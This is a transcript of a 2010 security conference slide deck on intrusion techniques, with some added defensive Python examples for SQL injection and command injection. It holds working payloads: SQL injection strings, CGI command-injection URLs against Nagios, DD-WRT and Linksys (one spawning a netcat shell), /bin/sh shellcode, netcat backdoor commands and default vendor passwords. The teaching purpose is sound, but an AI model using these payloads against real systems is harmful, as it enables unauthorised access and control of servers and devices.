Intrusion Techniques
   DcLabs Hacking Tour 2010
Several attack techniques will be demonstrated, such as code injection, brute force, backdoors, rootkits, exploits and various other ways of gaining and improperly keeping access to servers; alongside them, best practices for preventing the kinds of attacks mentioned are discussed. (Talk given at the 3rd Free Software Festival in Belo Horizonte - FSLBH)
1. Intrusion Techniques
   DcLabs Hacking Tour 2010
   Ewerson Guimarães (Crash)
   Rener Silva (Gr1nch)

2. Agenda
   FingerPrint, Web-Bugs, Backdoors, MetaSploit, Brute Force, IIS SemiColon, ShellCode, Man-in-the-Middle, Exploits, Sniffers, Scanners/Fuzzers

3. FingerPrint
   Grabs information about a target host. Ex: it is used to identify the operating system and/or service (daemon) version number from the unique characteristics of the host's TCP/IP responses.
   The best tool for discovering operating systems, services, devices and more: NMAP (Network Mapper)
   Basic commands:
     nmap host          (Basic)
     nmap -sV host      (Service versions)
     nmap -P0 host      (Ignore ICMP ECHO-REPLY)
     nmap -O host       (Try to grab the O.S. version)
     nmap -f host       (Firewall/IDS/IPS evasion)

4. Passive - FingerPrint
   • TTL - What the operating system sets the Time To Live to on the outbound packet
   • Window Size - What the operating system sets the Window Size to
   • DF - Does the operating system set the Don't Fragment bit
   • TOS - Does the operating system set the Type of Service, and if so, to what
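To make the four passive-fingerprint fields of slide 4 concrete, here is an added example (not from the original slides) that pulls TTL, window size, DF and TOS out of a raw IPv4/TCP SYN and matches them against a small signature table. The packet builder and the signature values are constructed for illustration; the table is not p0f's or nmap's real database, and the rounding of observed TTL up to the nearest common default (32/64/128/255) is the usual hop-count heuristic.

```python
import struct

# Illustrative signature table (constructed for this example; not p0f's or nmap's real database).
# Each entry: commonly cited initial TTL, DF bit and SYN window size for that stack.
SIGNATURES = [
    {"os": "Linux 2.6 (illustrative)", "ttl": 64, "df": True, "window": 5840},
    {"os": "Windows XP (illustrative)", "ttl": 128, "df": True, "window": 65535},
    {"os": "OpenBSD (illustrative)", "ttl": 64, "df": True, "window": 16384},
]

def build_syn(ttl, tos, df, window):
    """Construct a 20-byte IPv4 header + 20-byte TCP SYN header (sample packet, checksums zeroed)."""
    flags_frag = 0x4000 if df else 0            # bit 14 of the flags/fragment field is DF
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, tos, 40, 0x1234, flags_frag, ttl, 6, 0,
                         bytes([192, 0, 2, 10]), bytes([192, 0, 2, 20]))
    tcp_hdr = struct.pack("!HHIIBBHHH", 40000, 80, 0, 0, 0x50, 0x02, window, 0, 0)
    return ip_hdr + tcp_hdr

def passive_features(pkt):
    """Extract the slide-4 fields (TTL, window, DF, TOS) from a raw IPv4/TCP packet."""
    ver_ihl, tos, _, _, flags_frag, ttl, proto = struct.unpack("!BBHHHBB", pkt[:10])
    if ver_ihl >> 4 != 4 or proto != 6:
        raise ValueError("expected an IPv4/TCP packet")
    ihl = (ver_ihl & 0x0F) * 4                  # IP header length in bytes; TCP starts there
    (window,) = struct.unpack("!H", pkt[ihl + 14:ihl + 16])  # window = bytes 14-15 of TCP header
    return {"ttl": ttl, "window": window, "df": bool(flags_frag & 0x4000), "tos": tos}

def initial_ttl(observed):
    """Observed TTL is the stack default minus hops travelled; round up to the nearest default."""
    return next((t for t in (32, 64, 128, 255) if observed <= t), 255)

def guess_os(features):
    """Return (os_name, estimated_hops); 'unknown' when no signature matches."""
    start = initial_ttl(features["ttl"])
    hops = start - features["ttl"]
    for sig in SIGNATURES:
        if (sig["ttl"], sig["df"], sig["window"]) == (start, features["df"], features["window"]):
            return sig["os"], hops
    return "unknown", hops
```

On a real capture the same function would be fed the IP payload of each inbound SYN; window size is the least stable of the four fields, since it changes with kernel tuning.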
5. FingerPrint
   Matrix:

6. FingerPrint
   U. Bourne

7. Web Vulnerability
   These vulnerabilities are initially exploited through malicious browser requests, compromising the target in a matter of minutes.
   SQL-Injection, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), CGI Command Injection, PHP-Injection

8. Web Vulnerability
   SQL-Injection
   It occurs when the attacker can insert a series of SQL statements within a 'query' by manipulating the application's data entry.
     SELECT campos FROM tabela WHERE campo = 'test@test.com';
   Inject string: some' OR 'x'='x
     SELECT fields FROM table WHERE field = 'some' OR 'x'='x';
   Common test strings:
     admin'--
     " or 0=0 #
     ' or 1=1--
     hi' or 'a'='a
     ' or 0=0 --
     or 0=0 #
     " or 1=1--
     hi') or ('a'='a
     " or 0=0 --
     ' or 'x'='x
     or 1=1--
     hi") or ("a"="a
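The query shape on slide 8, as an added example (not from the original slides) that runs both the spliced-string lookup the slide describes and its parameterized replacement against a constructed in-memory SQLite table, so the effect of the slide's `some' OR 'x'='x` string can be observed directly.

```python
import sqlite3

def make_db():
    """Constructed sample table in the slide's SELECT ... WHERE field = '...' shape."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, email TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [(1, "test@test.com"), (2, "admin@corp.example"), (3, "bob@corp.example")])
    return con

def vulnerable_sql(email):
    """The slide's pattern: user input spliced straight into the query text."""
    return f"SELECT id, email FROM users WHERE email = '{email}'"

def lookup_vulnerable(con, email):
    # A quote in the input closes the literal early; the rest becomes SQL syntax.
    return [row[1] for row in con.execute(vulnerable_sql(email))]

def lookup_parameterized(con, email):
    # The fix: the driver binds the value, so quotes inside it are data, not syntax.
    return [row[1] for row in
            con.execute("SELECT id, email FROM users WHERE email = ?", (email,))]
```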
9. SQL-Injection

10. Web Vulnerability
    CGI Command Injection
    It occurs when the attacker inserts a series of commands exploiting vulnerable CGI scripts.
    Nagios:
      https://www.xxx.com/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+%24PATH
    DD-WRT:
      http://www.xxx.com/cgi-bin/;nc$IFS-l$IFS-p$IFS5555$IFS-e$IFS/bin/sh
    Linksys - Wireless:
      /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1
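All three CGI examples on slide 10 share one defect: a "ping target" parameter is pasted into a shell command line. As an added example (not from the original slides, and not code from Nagios, DD-WRT or Linksys), the function below builds that command line, counts how many commands a POSIX shell would actually see in it, and shows the hardened form: validate the value as an IP address and run an argv list with no shell at all. The 192.0.2.x targets are constructed documentation addresses.

```python
import ipaddress
import shlex

def build_ping_vulnerable(target):
    """The pattern behind the slide's CGI bugs: the request parameter is pasted into a shell
    command line. Through a shell, ';' (or the $IFS trick) turns the tail into a second command."""
    return f"ping -c 1 {target}"

def shell_command_count(cmdline):
    """Count the commands a POSIX shell would see (';', '|', '&', '&&', '||' separate them)."""
    tokens = list(shlex.shlex(cmdline, posix=True, punctuation_chars=True))
    return 1 + sum(1 for t in tokens if t in (";", "|", "||", "&", "&&"))

def build_ping_hardened(target):
    """Validate the parameter as an IP address and return an argv list for subprocess.run(shell=False).
    Anything that is not a literal address (';', '$IFS', '/bin/ps' ...) is rejected before execution."""
    try:
        addr = ipaddress.ip_address(target.strip())
    except ValueError:
        raise ValueError(f"rejected ping target: {target!r}") from None
    return ["ping", "-c", "1", str(addr)]
```

Rejections from build_ping_hardened are worth logging: a ping parameter containing ';' or '$IFS' is a clear signal that the script is being probed.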
11. ShellCode Introduction

    #include <stdio.h>
    #include <unistd.h>

    int main(void) {
        char *comando[2];              /* argv for the new process */
        comando[0] = "/bin/sh";
        comando[1] = NULL;
        execve(comando[0], comando, NULL);
        return 0;                      /* reached only if execve fails */
    }

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x0a\x31\xc0\x88\x46\x09\x89\x46\x0e\xb0\x0b\x89"
        "\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
        "\xdc\xff\xff\xff/bin/sh";
12. Exploits
    Kinds of Exploits:
    Local: Usually, the objective of a local exploit is to elevate the user's privileges on the machine as close as possible to root (uid=0) or administrator. They are written to exploit kernel bugs or suid binaries.
    Remote: It works over a network connection and exploits the vulnerable target without any prior access to it.
      www.securityfocus.com
      www.milw0rm.com
      www.secunia.com
      www.exploit-db.com
    0Days: usually an unpublished exploit for a brand new vulnerability. You can buy them! $$$$$

13. Backdoors/RootKits
    Used to maintain access to the system. We can use Netcat for this purpose:
      nc -vv -l -p 5555
      nc -vv -l -p 5555 -e /bin/bash
      nc <ip> <port>
    RootKits: the main purpose of a rootkit is to hide the attacker's presence by replacing vital system binaries on the target system.
    Example: hide files (matching given strings), run a command when a string matches, hide processes, hide open ports, and others.

14. Default/Weak passwords
    Default passwords are set by the manufacturers/developers and were not changed after installation/configuration. As supplied by the system vendor and meant to be changed at installation time (nobody does this shit).
    Ex:
      3Com switch: User: security  Pass: security
      FireBird:    User: sysdba    Pass: masterkey
    Weak: passwords that are easily guessed or follow a keyboard sequence. Ex: 123456, love, home phone number, birthday, etc.

15. Brute Force
    It consists in using random combinations of characters/numbers and symbols, wordlists and/or string generators to crack a password.
    Ex: John the Ripper, Hydra, SSH Brute Force

16. Brute Force
    DirBuster - DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers.

17. Scanners/Fuzzers
    There are 2 types of scanners: Specific, which are written for a specific vulnerability (BSQLHacker, SQLMAP), and Generic, which are written for various kinds of vulnerabilities. Generic scanners use known service banners/strings to locate potential targets/vulnerabilities.
    Saint, W3af, Nexpose Community

18. Scanners/Fuzzers
    Nexpose Community

19. Scanners/Fuzzers
    W3af

20. Scanners/Fuzzers
    Saint

21. Sniffers
    A sniffer monitors and analyzes network traffic. Some of these packets may contain critical information (such as logins, passwords and other cool info).
    Wireshark

22. DoS
    Denial of Service consists of attempts to prevent valid users from using a particular feature, or simply to take it down.
    SYN FLOOD, UDP Packet Storm, DDoS, Smurf Attack

23. MetaSploit

24. MetaSploit

25. IIS SemiColon
    Secure it? Wtf?

26. Man-in-the-Middle

27. Hardening your server
    HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files, allowing you to get a quick overview of the security status of your system.
    http://hntool.net

28. UAI?
    crash@dclabs.com.br    irc.freenode.net #dclabs
    gr1nch@dclabs.com.br   #securityguys